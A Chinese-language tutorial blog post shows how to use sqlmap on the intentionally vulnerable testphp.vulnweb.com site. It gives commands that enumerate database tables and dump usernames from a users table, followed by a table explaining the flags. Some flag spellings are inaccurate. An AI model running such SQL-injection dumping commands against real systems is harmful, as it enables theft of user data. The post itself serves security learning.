昨天我們確定了有 SQLi 的漏洞之後，我們就可以拿一些更暴力的工具來玩壞他

sql map

這個是一個自動的 sql 掃描工具，基本上就是自動檢測跟利用 SQLi，用途很廣，基本上從最基礎的掃描到後面進階一點甚至可以拿來進行 RCE （remote-code-execution），當然那是後話，今天只是簡單講一下 sql map 有什麽基礎的應用

常見指令

它的指令真的多到不可思議，所以我在這裡附上連結來偷懶應該是不會怎樣吧，對吧？
點我就可以看到酷酷的指令了

ok 言歸正傳，那這個工具對我們有什麽用呢？那就打開我們的 kali 來玩玩看吧，裡面預設已經裝好了所以直接喂指令給他就好了

payload

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart -tables -batch

執行後就會看到酷酷的東西

可以看到他把整個資料庫掃了出來，但這個只是所有產品的 table ，不是我們想要的東西，於是我們可以調整一下參數繼續挖掘

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart -T users -C uname --dump -batch

你會看到 users 的東西直接被掃出來啦

這個工具是建立在可以使用 SQLi 的基礎上才能使用的，至於剛剛使用的參數有什麽用我列在下面

-D                         指定 DBMS 要枚舉的資料庫
-table                     檢查常見的資料表是否存在
-batch                     永遠不要詢問使用者輸入，使用預設行為
-T                         指定要枚舉的資料表
-C                         指定要枚舉的資料表欄位
--dump                     列出 DBMS 資料庫表格內容

• 注 DMBS（database management system）資料庫管理系統